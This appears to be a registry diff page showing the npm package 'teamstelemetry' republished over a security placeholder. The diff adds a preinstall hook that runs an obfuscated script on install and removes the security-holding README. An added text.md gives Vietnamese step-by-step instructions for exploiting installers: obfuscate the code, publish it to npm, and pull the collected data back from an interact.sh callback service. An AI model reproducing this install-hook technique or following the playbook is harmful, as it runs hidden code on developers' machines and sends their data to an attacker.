teamstelemetry 0.0.1-security → 9.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of teamstelemetry might be problematic. Click here for more details.
- package/2025-32-03_05_32.json +1 -0
- package/Readme.md +1 -0
- package/app.js +57 -0
- package/app.obfuscated.js +1 -0
- package/app_old.js +64 -0
- package/data.txt +649 -0
- package/data2.txt +478 -0
- package/data_collect.txt +78 -0
- package/extract.js +113 -0
- package/extract_debug.js +72 -0
- package/extract_oast_data.py +67 -0
- package/extract_special_line.py +129 -0
- package/interactsh-export.json +1 -0
- package/output.json +2598 -0
- package/output2.json +1914 -0
- package/package.json +10 -4
- package/text.md +17 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "teamstelemetry",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
3
|
+
"version": "9.1.0",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node app.obfuscated.js"
|
|
8
|
+
},
|
|
9
|
+
"keywords": [],
|
|
10
|
+
"author": "Finance Dev",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|
package/text.md
ADDED
|
@@ -0,0 +1,17 @@
|
|
|
1
|
+
# Cách khai thác
|
|
2
|
+
|
|
3
|
+
1. Sửa tên package và version trong package.json
|
|
4
|
+
2. Chayj
|
|
5
|
+
```
|
|
6
|
+
javascript-obfuscator app.js --output app.obfuscated.js
|
|
7
|
+
```
|
|
8
|
+
3. chạy npm publish
|
|
9
|
+
4. export dữ liệu từ interact.sh về
|
|
10
|
+
5.
|
|
11
|
+
```
|
|
12
|
+
mv ~/Downloads/2025-* ./interactsh-export.json
|
|
13
|
+
```
|
|
14
|
+
6. extract data
|
|
15
|
+
```
|
|
16
|
+
node extract.js
|
|
17
|
+
```
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=teamstelemetry for more information.
|